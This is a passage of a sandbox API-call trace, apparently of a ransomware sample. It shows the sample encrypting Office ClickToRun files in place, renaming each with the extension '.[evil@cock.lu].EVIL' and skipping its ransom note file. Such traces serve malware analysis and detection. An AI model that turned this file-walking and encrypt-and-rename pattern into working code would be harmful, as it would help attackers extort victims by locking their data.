hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.623] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0084.667] CloseHandle (hObject=0x1a4) returned 1 [0084.804] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0084.805] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0084.805] __uncaught_exception () returned 0x84b1160800 [0084.805] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0084.905] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.[evil@cock.lu].evil")) returned 1 [0084.906] ??_V@YAXPEAX@Z () returned 0x1 [0084.910] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll", dwFileAttributes=0x0) returned 0 [0084.910] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0084.910] wcsstr (_Str="mso30win32client.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0084.910] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 79 [0084.910] wcscmp (_String1="mso30win32client.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0084.910] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mso30win32client.dll") returned 0x0 [0084.910] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 0x4f [0084.910] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0084.913] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0085.058] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0085.058] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0085.058] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0085.058] _errno () returned 0x84b1160840 [0085.060] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.060] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0085.091] CloseHandle (hObject=0x1a4) returned 1 [0085.364] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0085.364] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0085.364] __uncaught_exception () returned 0x84b1160800 [0085.364] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0085.466] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.[evil@cock.lu].evil")) returned 1 [0085.466] ??_V@YAXPEAX@Z () returned 0x1 [0085.469] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll", dwFileAttributes=0x0) returned 0 [0085.469] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0085.469] wcsstr (_Str="mso40uires.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0085.469] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 73 [0085.469] wcscmp (_String1="mso40uires.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0085.469] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mso40uires.dll") returned 0x0 [0085.469] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 0x49 [0085.469] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0085.480] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0085.783] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0085.783] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0085.783] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0085.783] _errno () returned 0x84b1160840 [0085.784] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.784] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0085.826] CloseHandle (hObject=0x1a4) returned 1 [0085.981] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0085.981] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0085.981] __uncaught_exception () returned 0x84b1160800 [0085.981] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0086.053] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.[evil@cock.lu].evil")) returned 1 [0086.054] ??_V@YAXPEAX@Z () returned 0x1 [0086.057] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll", dwFileAttributes=0x0) returned 0 [0086.057] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0086.057] wcsstr (_Str="mso40uiwin32client.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0086.057] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 81 [0086.057] wcscmp (_String1="mso40uiwin32client.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0086.057] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mso40uiwin32client.dll") returned 0x0 [0086.057] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 0x51 [0086.057] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0086.059] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0086.181] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0086.181] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0086.181] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0086.181] _errno () returned 0x84b1160840 [0086.182] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.182] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0086.230] CloseHandle (hObject=0x1a4) returned 1 [0086.588] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0086.588] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0086.588] __uncaught_exception () returned 0x84b1160800 [0086.588] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0086.905] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.[evil@cock.lu].evil")) returned 1 [0086.906] ??_V@YAXPEAX@Z () returned 0x1 [0086.910] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll", dwFileAttributes=0x0) returned 0 [0086.910] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0086.910] wcsstr (_Str="msointl30.en-us.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0086.910] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0086.910] wcscmp (_String1="msointl30.en-us.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0086.910] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msointl30.en-us.dll") returned 0x0 [0086.910] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 0x4e [0086.910] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0086.912] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x128c8, lpOverlapped=0x0) returned 1 [0086.941] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0086.941] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0086.941] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0086.941] _errno () returned 0x84b1160840 [0086.941] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.941] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x128e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x128e0, lpOverlapped=0x0) returned 1 [0086.941] CloseHandle (hObject=0x1a4) returned 1 [0086.943] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0086.943] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0086.943] __uncaught_exception () returned 0x84b1160800 [0086.944] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0086.945] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll.[evil@cock.lu].evil")) returned 1 [0086.946] ??_V@YAXPEAX@Z () returned 0x1 [0086.950] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll", dwFileAttributes=0x0) returned 0 [0086.950] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0086.950] wcsstr (_Str="msvcp120.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0086.950] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 71 [0086.950] wcscmp (_String1="msvcp120.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0086.950] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcp120.dll") returned 0x0 [0086.950] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 0x47 [0086.950] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0086.950] GetLastError () returned 0x20 [0086.950] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0086.950] wcsstr (_Str="msvcp140.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0086.950] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 71 [0086.950] wcscmp (_String1="msvcp140.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0086.951] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcp140.dll") returned 0x0 [0086.951] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 0x47 [0086.951] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0086.951] GetLastError () returned 0x20 [0086.951] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0086.951] wcsstr (_Str="msvcr120.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0086.951] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 71 [0086.951] wcscmp (_String1="msvcr120.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0086.951] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcr120.dll") returned 0x0 [0086.951] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 0x47 [0086.951] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0086.951] GetLastError () returned 0x20 [0086.951] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0086.951] wcsstr (_Str="OfficeC2RClient.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0086.951] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 78 [0086.951] wcscmp (_String1="OfficeC2RClient.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0086.951] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OfficeC2RClient.exe") returned 0x0 [0086.951] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 0x4e [0086.951] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0086.954] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0087.044] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0087.044] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.044] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.044] _errno () returned 0x84b1160840 [0087.045] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.045] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0087.072] CloseHandle (hObject=0x1a4) returned 1 [0087.463] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0087.463] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0087.463] __uncaught_exception () returned 0x84b1160800 [0087.463] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0087.646] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.[evil@cock.lu].evil")) returned 1 [0087.646] ??_V@YAXPEAX@Z () returned 0x1 [0087.649] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", dwFileAttributes=0x0) returned 0 [0087.649] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0087.649] wcsstr (_Str="OfficeC2RCom.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0087.649] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0087.650] wcscmp (_String1="OfficeC2RCom.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0087.650] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OfficeC2RCom.dll") returned 0x0 [0087.650] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 0x4b [0087.650] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0087.652] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0087.734] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0087.734] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.734] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.734] _errno () returned 0x84b1160840 [0087.735] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.735] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0087.792] CloseHandle (hObject=0x1a4) returned 1 [0087.815] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0087.816] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0087.816] __uncaught_exception () returned 0x84b1160800 [0087.816] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0087.836] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll.[evil@cock.lu].evil")) returned 1 [0087.837] ??_V@YAXPEAX@Z () returned 0x1 [0087.839] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll", dwFileAttributes=0x0) returned 0 [0087.839] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0087.839] wcsstr (_Str="OfficeClickToRun.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0087.840] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 79 [0087.840] wcscmp (_String1="OfficeClickToRun.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0087.840] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OfficeClickToRun.exe") returned 0x0 [0087.840] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 0x4f [0087.840] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0087.840] GetLastError () returned 0x20 [0087.840] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0087.840] wcsstr (_Str="OfficeUpdateSchedule.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0087.840] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0087.840] wcscmp (_String1="OfficeUpdateSchedule.xml", 